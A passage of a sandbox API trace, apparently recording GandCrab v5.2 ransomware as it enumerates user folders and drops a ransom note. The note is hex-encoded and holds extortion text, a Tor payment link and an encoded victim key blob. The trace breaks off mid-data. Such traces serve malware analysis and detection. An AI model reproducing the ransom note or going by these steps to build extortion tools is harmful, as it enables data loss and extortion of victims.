param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Public\\d2ca4a09d2ca4deb61a.lock") returned 40 [0096.962] CreateFileW (lpFileName="C:\\Users\\Public\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\public\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x228 [0096.963] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.963] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.963] lstrlenW (lpString="C:\\Users\\Public\\") returned 16 [0096.963] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\*") returned="C:\\Users\\Public\\*" [0096.963] FindFirstFileExW (in: lpFileName="C:\\Users\\Public\\*", fInfoLevelId=0x1, lpFindFileData=0x259f7b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f7b8) returned 0x503938 [0096.963] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.963] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.965] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.965] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.965] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.965] lstrcmpW (lpString1="AccountPictures", lpString2=".") returned 1 [0096.965] lstrcmpW (lpString1="AccountPictures", lpString2="..") returned 1 [0096.965] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="AccountPictures" | out: lpString1="C:\\Users\\Public\\AccountPictures") returned="C:\\Users\\Public\\AccountPictures" [0096.965] lstrcatW (in: lpString1="C:\\Users\\Public\\AccountPictures", lpString2="\\" | out: lpString1="C:\\Users\\Public\\AccountPictures\\") returned="C:\\Users\\Public\\AccountPictures\\" [0096.965] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.965] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.965] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.965] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.965] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.965] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.966] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.966] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.966] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.966] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.966] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.966] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Public\\AccountPictures\\\\TITWMVJL-DECRYPT.txt") returned 53 [0096.966] CreateFileW (lpFileName="C:\\Users\\Public\\AccountPictures\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\public\\accountpictures\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0096.967] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\